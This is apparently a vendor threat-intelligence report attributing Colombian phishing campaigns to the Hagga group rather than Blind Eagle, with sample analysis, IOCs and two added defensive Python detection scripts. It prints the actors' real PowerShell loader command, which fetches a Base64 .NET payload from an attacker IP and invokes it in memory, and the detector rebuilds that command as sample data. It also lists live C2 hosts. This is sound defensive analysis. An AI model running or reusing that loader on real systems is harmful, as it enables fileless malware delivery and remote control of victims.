
Background

Hagga/Aggah Group

Hagga is a threat group motivated by information theft, first publicly disclosed by Unit 42 researchers in March 2019 [1]. Initially, researchers believed the activity targeted organizations in the Middle East; further research indicated it was part of a larger campaign that affected not only the Middle East but also the United States, Europe, and Asia. Unit 42 referred to this group as Aggah. In the early attacks, the Trojan used the string "hagga" as a field separator when sending data to the C2 server; the same string was the name of the Pastebin account hosting the payload, which gave the activity the name "Aggah". Security researchers outside China have since referred to the group as Hagga/Aggah, and this report uses the name Hagga.

Initially, Unit 42 believed that due to TTP similarities and the use of Revenge RAT, Hagga might be associated with the Gorgon Group, a Pakistani organization known for targeting Western governments. However, no prominent Gorgon Group indicators were observed in that investigation, so Unit 42 could not definitively link Hagga to the Gorgon Group.

Hagga has been active since 2019, with traces dating back to 2018, and its TTPs have remained largely consistent across campaigns. Early on, the group used the Internet Archive, Pastebin, and Blogspot to host malicious scripts and payloads, usually delivering RevengeRAT. Later campaigns have used LimeRAT, NjRAT, AsyncRAT, NanoCoreRAT, RemcosRAT, and Agent Tesla.

The following image illustrates the publicly disclosed activities of the Hagga organization over the years.


Blind Eagle (APT-Q-98)

Blind Eagle (internally identified as APT-Q-98 by QiAnXin) is an APT organization independently discovered and first disclosed by QiAnXin. The Blind Eagle organization is a suspected APT group originating from South America, primarily targeting Colombia. Since April 2018, this organization has carried out organized, planned, and targeted long-term attacks against Colombian government institutions and large companies in vital sectors such as finance, oil, and manufacturing.

Early Blind Eagle TTPs involved compromising Spanish-language websites, or registering privacy-protected domains, to host payload files and lure documents. The group delivered RAR-encrypted MHTML bait documents carrying malicious macros through spear-phishing emails, with the RAR password included in the email body, which effectively evades email gateway scanning. Blind Eagle frequently impersonates the Colombian National Civil Registry, the National Tax and Customs Administration, the National Statistical Office, the National Cyber Police, and the National Department of Justice, targeting Colombian government and financial institutions as well as the Colombian branches of large domestic or multinational companies. It uses commercial Trojans for remote control of targets and relies on dynamic DNS domains for C2. Its ultimate goal is to implant backdoors that give it control of the target machines, providing a foothold for lateral movement in later stages.

Throughout the investigation, the Hagga organization and the Blind Eagle organization have been tracked as two separate entities. However, there are certain similarities in TTPs between Hagga and Blind Eagle. Moreover, both organizations primarily use commercial or open-source Trojans as their final payloads, making it difficult to differentiate them based on TTPs. Currently, there is no strong evidence to establish a direct relationship between the Hagga and Blind Eagle organizations. However, some foreign security researchers speculate that Hagga may offer its hacking services for sale [2].


Investigation Trigger

The QiAnXin Threat Intelligence Center's RedDrIp team continuously tracks major APT groups worldwide. While investigating Blind Eagle (APT-Q-98), which is active in South America, we found that since 2022 hundreds of bait PDF files have been uploaded from Colombia. These PDFs are distributed mainly by email and impersonate a range of Colombian institutions, including the Ministry of Justice, the Tax and Customs Administration, Davivienda Bank, the Ministry of Finance, the Ministry of Transportation, and law firms. The PDF body contains the password for a compressed archive and entices the victim to click a short link to download it. After extraction, the victim is tricked into executing a VBS script disguised as a PDF, which starts a multi-stage fileless infection chain that ultimately loads remote-control software.

The initial lure emails were written in Spanish.

Fines and penalties notice for traffic accidents from Colombia's comprehensive information processing system SIMIT.

Restriction notice disguised as being issued by Davivienda Bank in Colombia.

Notice related to personal income tax issues from Colombia's Ministry of Finance, Tax, and Customs Administration.

Summons notice from the Judicial Committee of Colombia's Supreme Court.
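The lure PDFs described above have two tell-tale traits: a clickable short link that leads to the archive, and the archive password handed over in the visible text. The following triage script is an added example written for this page, not QiAnXin's tooling; it pulls link targets out of a PDF's /URI actions and the literal text strings on the page, flags targets on URL-shortener domains, and looks for a password given after a keyword such as "contraseña" or "clave". The PDF bytes, the shortener list, and the scoring rule are all constructed for the example.

```python
"""Triage helper for password-plus-short-link lure PDFs (added example)."""
import re
from urllib.parse import urlparse

# Constructed: a minimal PDF with one link annotation and one text string.
# bit.ly is used as a representative shortener; the path is a placeholder.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] /Contents 5 0 R >> endobj
4 0 obj << /Type /Annot /Subtype /Link
   /A << /S /URI /URI (https://bit.ly/placeholder-link) >> >> endobj
5 0 obj << /Length 84 >> stream
BT /F1 12 Tf 72 700 Td (Descargue el documento. Contrasena del archivo: 2023) Tj ET
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Assumed list; extend it from your own telemetry.
SHORTENER_DOMAINS = {"bit.ly", "tinyurl.com", "cutt.ly", "is.gd", "rb.gy", "t.ly"}

# /URI actions live in annotation dictionaries; literal text strings end in Tj.
URI_ACTION_RE = re.compile(rb"/URI\s*\(([^)]*)\)")
TEXT_STRING_RE = re.compile(rb"\(([^)]*)\)\s*Tj")
# keyword, up to three filler words, a separator, then the password token
PASSWORD_RE = re.compile(
    r"(?:contrase[ñn]a|clave|password)(?:\s+\w+){0,3}\s*[:\-]\s*(\S{3,})", re.I)


def extract_uris(pdf: bytes) -> list:
    """Link targets from /URI actions, decoded as Latin-1 (PDF byte strings)."""
    return [m.decode("latin-1") for m in URI_ACTION_RE.findall(pdf)]


def extract_text(pdf: bytes) -> str:
    """Visible text from uncompressed literal strings (Tj operands)."""
    return " ".join(m.decode("latin-1") for m in TEXT_STRING_RE.findall(pdf))


def triage(pdf: bytes) -> dict:
    uris = extract_uris(pdf)
    shortened = [u for u in uris if urlparse(u).hostname in SHORTENER_DOMAINS]
    m = PASSWORD_RE.search(extract_text(pdf))
    password = m.group(1) if m else None
    return {
        "uris": uris,
        "shortened": shortened,
        "password_in_body": password,
        # Assumed rule: shortener link plus an archive password is the lure pattern.
        "lure_like": bool(shortened) and password is not None,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_PDF))
```

The text scan only sees uncompressed content streams; real lures usually FlateDecode their streams, so run the same regexes over the inflated stream data (or a PDF library's text output) before trusting a negative result. The /URI actions are a better first signal because annotation dictionaries are often left uncompressed.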

Initially, we investigated a large number of bait files, which exhibited TTPs nearly identical to those of Blind Eagle. The bait files were written in Spanish and uploaded from Colombia, aligning with Blind Eagle's attack targets and technical characteristics. Therefore, we initially attributed these attack activities to the Blind Eagle organization.

During the analysis of these files, we discovered an IP address, 172.174.176.153, hosting an open directory used to store subsequent payloads. This finding aligns with the blog published by the foreign company BlackBerry regarding the disclosure of Blind Eagle activities [3]. However, after some time, the hosted content in the open directory of this IP address was updated, which caught our attention.

Analysis of the new payload showed that it was still the C# injector commonly used by Blind Eagle. On the same day, however, we came across a new phishing email tied to that IP which, judging by its content, was a spear-phishing attempt against a Chinese company. Both the email body and the bait attachment were quite crude and looked more like the work of an ordinary criminal group than of a professional APT organization.

Reviewing the attack activities of Blind Eagle since their disclosure, we haven't found any examples of them targeting China. However, the arrival of this attack email forced us to reevaluate the organization behind the attack activities previously attributed to Blind Eagle.


Attribution of Activities

Back in 2019, when we publicly disclosed the attack activities of Blind Eagle, we also shared their TTPs in a blog post [4].

The following diagram represents the attack flow of Blind Eagle as disclosed by another cybersecurity company in 2022 [5].

We have represented the attack chain of this recent Hagga organization's attack activity using the following diagram.

As can be seen, this recent attack activity aligns with Blind Eagle's previous TTPs to a large extent. It has not only improved certain details of the activities but also expanded the range of initial bait documents, including office documents carrying vulnerabilities and highly effective bait PDF documents for bypassing antivirus detection. The main difference lies in the variation of the final loaded Remote Access Trojan (RAT).

Based on the above comparison, we cannot differentiate the Blind Eagle organization from the Hagga organization based on TTPs alone. Therefore, we attempted to attribute them based on the following details.

(1) Target of the Attack

The known Blind Eagle targets lie mainly in Colombia and a few other South American countries such as Ecuador, Panama, and Chile, whereas known Hagga targets span the Middle East, Europe, Asia, and the Americas. Although most of the captured samples originate from Colombia, the discovery of samples targeting Chinese companies, together with Hagga's earlier targeting of Taiwan [6], inclines us to attribute this activity to Hagga.

(2) Similarities in the Hosting of Malicious Payloads

The IP hosting the malicious payload, 172.174.176.153, shares the same directory structure and file name suffix as the one disclosed by another cybersecurity company for the Hagga organization [7].

In 2022, a foreign cybersecurity company reported that Hagga appeared to run XAMPP as its web server and to host the Mana Tools C2 panel on a Windows virtual server [8]. The payload-hosting IP 172.174.176.153 also runs XAMPP and exposes port 3306, the MySQL default port.

(3) Language and Sender Address of the Spear-phishing Email

Blind Eagle writes its lures mainly in Spanish, while the spear-phishing email in this case is in English. In addition, the actual sender domain of the captured email is slot0.cedarstz.top, which resolves to 185.28.39.60, an IP belonging to a known botnet. As early as 2020, a foreign cybersecurity company described how Hagga operates a botnet without renting any servers [9].

(4) Usage of Commercial Trojans

The commercial and open-source Trojans observed in Hagga's hands include RevengeRAT, LimeRAT, NjRAT, AsyncRAT, NanoCoreRAT, WarzoneRAT, RemcosRAT, and Agent Tesla, whereas those observed with Blind Eagle include LimeRAT, NjRAT, AsyncRAT, Imminent Monitor RAT, and QuasarRAT. Based on existing reports, the set of Trojans used by Hagga is broader than that used by Blind Eagle, indicating a wider range of activity and a higher operational tempo.


Speculations

(1) Possibility 1: Is the Hagga Group a Sub-group of the Blind Eagle Group?

From the TTP perspective, the two are very similar. Both use Spanish for spear-phishing attacks targeting Colombia, both download payloads from public repositories, both use dynamic domains for C2, both employ publicly available commercial Trojans as final payloads, and both have information theft as their objective.

Although there is no strong evidence of a direct relationship between Hagga and Blind Eagle, we speculate that the two may be complementary: one focuses on attacking Colombia, while the other builds a botnet and shows interest in major countries worldwide.

(2) Possibility 2: Does the Hagga Group Provide Cyber Weapons to the Blind Eagle Group?

In 2020, the Hagga organization not only targeted Europe but was also discovered engaging in Bitcoin theft activities. In their recent activities, the attackers impersonated B2B companies in Europe, the Middle East, and Asia, indicating that their targets are not limited to specific regions. The targeted victims' sectors and locations also indicate that the attackers are attempting to disrupt businesses across various industries, from manufacturing to agriculture.

Additionally, on the Medium platform, Paul Burbage pointed out that Hagga sells, or gives away for free, malicious software to Nigerian threat actors, which is consistent with the data presented in that post [10]. This suggests that Hagga could likewise sell its TTPs and malware to Blind Eagle.

(3) Possibility 3: Imitating TTPs?

Throughout the entire attack chain, the hosting platforms as well as the VBS, PowerShell, and C# code are effectively readable source to any reverse engineer and can be copied and debugged directly. The possibility that one group is simply imitating the other's TTPs therefore cannot be ruled out.


Sample Analysis

The attachment INV20230503.xlsx in the spear-phishing email described above is a document that exploits CVE-2017-11882. The exploit fetches GEE.vbs from 109.206.240.64, which drops and executes KJH.vbs in the %appdata% directory; KJH.vbs in turn invokes PowerShell to fetch new_rump_vb.net.txt from 172.174.176.153 and execute it.

GEE.vbs, hosted on 109.206.240.64, is padded with numerous benign, in some cases open-source, code snippets, while the actual malicious code is hidden in a few lines.

This VBS code invokes PowerShell to execute the following command:

powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('04*●*☞#:▶ITS!}(ú░}(úø(@@*ú4*●*☞#:▶4}�ø▶4*●*☞#:▶∞*▲◀(∞*▲◀(.∞*▲◀(ø☀☞√�}П�sap4*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀spø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1','2No3me_3tartup'))

The new_rump_vb.net.txt file hosted on 172.174.176.153 is a Base64-encoded .NET assembly protected with Eziriz .NET Reactor.
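The command line above is the whole fileless stage: a download, a Base64 decode, an in-memory assembly load, and a reflective call into a named type and method. Each of those appears in legitimate administration scripts; the combination in a single process-creation event is what a detection should key on. The script below is an added example written for this page, not QiAnXin's or the actors' code. It scans process-creation command lines (Sysmon Event ID 1 or Security 4688 exports), decodes -EncodedCommand payloads first, flags the four-stage combination, and extracts the hosting URL and the invoked type/method as pivots. The sample command lines are constructed: the first mirrors the structure of the loader quoted above (same host, path, type and method) with the obfuscated first argument replaced by the placeholder 'x', the second is benign, and the third is the same loader wrapped in -enc; the three-of-four threshold is an assumption.

```python
"""Detect the download/decode/AppDomain.Load/reflective-Invoke loader pattern."""
import base64
import binascii
import re
from dataclasses import dataclass, field

# Constructed loader body: structure of the command quoted in the report,
# obfuscated first argument replaced by 'x'.
LOADER_BODY = (
    "[Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient)"
    ".DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));"
    "[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home')"
    ".GetMethod('VAI').Invoke($null, [object[]] ('x','1','2No3me_3tartup'))"
)


def _encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand is Base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed samples: plain loader, benign admin command, encoded loader.
SAMPLE_CMDLINES = [
    "powershell.exe " + LOADER_BODY,
    "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users\\alice\\Documents",
    "powershell.exe -NoP -w hidden -enc " + _encode_ps(LOADER_BODY),
]

# Each indicator alone is common in admin scripts; the combination is the signal.
INDICATORS = {
    "remote_download": re.compile(r"\.DownloadString\s*\(", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "in_memory_assembly_load": re.compile(
        r"\[System\.AppDomain\]::CurrentDomain\.Load\s*\(|"
        r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(", re.I),
    "reflective_invoke": re.compile(
        r"\.GetType\s*\([^)]*\)\s*\.GetMethod\s*\([^)]*\)\s*\.Invoke", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)
TYPE_METHOD_RE = re.compile(
    r"\.GetType\s*\(\s*['\"]([^'\"]+)['\"]\s*\)\s*\.GetMethod\s*\(\s*['\"]([^'\"]+)['\"]",
    re.I)
# -e, -ec, -en, -enc, -encodedcommand: PowerShell accepts any unambiguous prefix
ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    raw: str
    decoded: bool = False
    indicators: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    dotnet_type: str = ""
    dotnet_method: str = ""
    suspicious: bool = False


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_cmdline(cmdline: str) -> Finding:
    f = Finding(raw=cmdline)
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        f.decoded = True
        text = cmdline + " " + decoded  # keep launcher flags visible beside the script
    f.indicators = [name for name, rx in INDICATORS.items() if rx.search(text)]
    f.urls = URL_RE.findall(text)
    m = TYPE_METHOD_RE.search(text)
    if m:
        f.dotnet_type, f.dotnet_method = m.group(1), m.group(2)
    # Assumed threshold: three of the four stages is loader-like behaviour.
    f.suspicious = len(f.indicators) >= 3
    return f


def scan(cmdlines) -> list:
    """Return only the findings that look like a fileless loader."""
    return [f for f in (analyze_cmdline(c) for c in cmdlines) if f.suspicious]


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"decoded={f.decoded} stages={f.indicators} urls={f.urls} "
              f"entry={f.dotnet_type}.{f.dotnet_method}")
```

The extracted URL and type/method pair are the useful pivots: the report notes that the hosting path and file suffix on 172.174.176.153 matched earlier Hagga infrastructure, so the same fields from other hosts' telemetry can be clustered the same way. Command-line matching is bypassed by script-file execution, so pair it with Script Block Logging (Event ID 4104), where the same regexes apply to the decoded script text.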

The PowerShell script calls the VAI method, which first performs a series of string replacements and then downloads the next-stage payload. The replacement strings are relatively fixed and remained unchanged for a considerable period during our tracking, so we copied them into a dedicated string-replacement function for decoding.

The next-stage payload is downloaded from https://paste.ee/d/2cSTI/0 and run inside a puppet process (process hollowing).

The final injected payload is RemcosRAT.

It is worth noting that since new_rump_vb.net.txt was uploaded on May 1st, we identified 66 related malicious documents within just two weeks, including lure documents in xlsx and RTF formats, executable payloads in RAR and VBS formats, and even HTML pages.


Conclusion

Based on our tracking findings and the analysis of open-source reports, we believe that the Blind Eagle and Hagga organizations share highly similar TTPs, making it difficult to distinguish between them. In the absence of definitive evidence, we have put forward some hypotheses, hoping to discover more clues to substantiate them in the subsequent threat hunting process. Given the complexity of APT organization attacks and the indiscriminate nature of Hagga organization's attacks on major countries worldwide, the QiAnXin Threat Intelligence Center will conduct long-term tracing and monitoring to promptly detect security threats and respond effectively.

APT organization attacks have always posed significant cybersecurity threats to nations and enterprises. They are typically carefully planned by individuals driven by commercial or political motives, targeting specific organizations or countries. These attacks maintain a high level of stealthiness over an extended period, necessitating constant vigilance.


Protection Recommendations

QiAnXin Threat Intelligence Center reminds users to beware of phishing attacks. Do not open links of unknown origin shared on social media, do not execute email attachments from unknown senders, do not run unknown files with sensational titles, and do not install apps from unofficial sources. Back up important files regularly and keep software up to date by installing patches.

If there is a need to run an application of unknown origin, it is recommended to use the QiAnXin Threat Intelligence File Deep Analysis Platform (https://sandbox.ti.qianxin.com/sandbox/page) for identification. Currently, the platform supports deep analysis of various file formats, including Windows and Android platforms.

Currently, all products based on the threat intelligence data from the QiAnXin Threat Intelligence Center, including QiAnXin Threat Intelligence Platform (TIP), TianQing, TianYan Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situational Awareness, support accurate detection of such attacks.


IOC

MD5

8b4f37321a0943710991cfcb3b9b7190

ca6e616516964c35a0029bd051433945

19cfa6cb0add650c185be261ec837c30

92f37f5ac6d35f6f3648cfa468adbffb

b12dd8f3f0b4212ff6cbcbf953cd0c3d

fcda30f5e20e58c4488d0df22a5394c7

d1e0b8fd32607d972bf7ab08d3320bf7

79a9db31615e2b361f71b59dc38f7662

7824c8d9d48574a486b3ec2a61366365

4ea92c0e20bdc3b2260e8aebbdff29b5

b74d4df1edcc90c7f87ed1e317c65374

4ecbe5d483acc108ef3d4da1d0059667

e2b587346c7ba0df3d7656bf9c7fdd9b

a31a7e05c61a8714ff19069783e58b9d

994d66210dc9bf9cb7cec98ef74851a1

e0138ce3c2ad2a6a5526c925a491b336

6a97a1e05e95160145ee9eb8f565183e

a0855f2c4380b341f52bc20234ef51ef

476b807185039dc3757357c152b591d8

a53fd55368da169f33c0c6627a8aed6e

654b91ef5cac54600b778d7c6be61e91

ddb48789abe7a64fc57602447429f1aa

baebfc034c16952a7f03e3f3f1098e55

8c9632cc3a6b9b200c32eadf2037a531

ca79dc9ed70ffa093ef6fd9329340c26

9083644ca81cee6b82cf47eadb0205f6

5bc94fc42ecb7f2251105b6594ad8c23

436dfd3124389a33003d110611d40e0a

ea078b7cb5f046ca1391fff5e854a803

0e158df9d670f7fd3c6e307cf3a5115c

bd56581e6aa04b2d326b7fa61d9de59a

781d4bb9c2d7c0db25bae7228950e9ba

2871b39fa86ec78cba889f49878a2aa7

bf8f015801c158f139cc224b73a44efe

a7fc8d377baa2c48338c92ab155e2ebb

2734bf79d4e97db0d2bbb3a9d36001e9

08441cf0620348e6883f637d66f1c85e

72f2d66b0e2488f909adc83011344ad7

74490857d1514e063b83cb41176f8e83

d5e7e28df1eb397fe1d9fd5ab0963117

ebcc4866e1998c791921282b5a796b0e

4e22e125dd1e19f9205f0a55bea3ceca

da683e9d524b18d9912cb861e0e0d3ed

d16261e50f2006b2269c192e8f54de0c

7b9d0e8d2e36443f119637ebfc3064c8

dfcf236ba98c04e4eb880ed7ced53e5f


C&C

5.42.199.235

172.174.176.153

195.178.120.24

109.206.240.64

proccesupdate.duckdns.org:3460

potter1024.duckdns.org:1024

system88.duckdns.org:7777


Reference Links

[1]. https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/

[2]. https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

[3]. https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia

[4]. https://ti.qianxin.com/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations/

[5]. https://mp.weixin.qq.com/s/mTmJLHYC9bJDnphf_52JmA

[6]. https://www.anomali.com/blog/aggah-using-compromised-websites-to-target-businesses-across-asia-including-taiwan-manufacturing-industry

[7]. https://marcoramilli.com/2022/11/21/is-hagga-threat-actor-abusing-fsociety-framework/

[8]. https://www.team-cymru.com/post/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor

[9]. https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

[10]. https://medium.com/@paul.k.burbage/aggah-not-exactly-apt-5e51aaff95f5
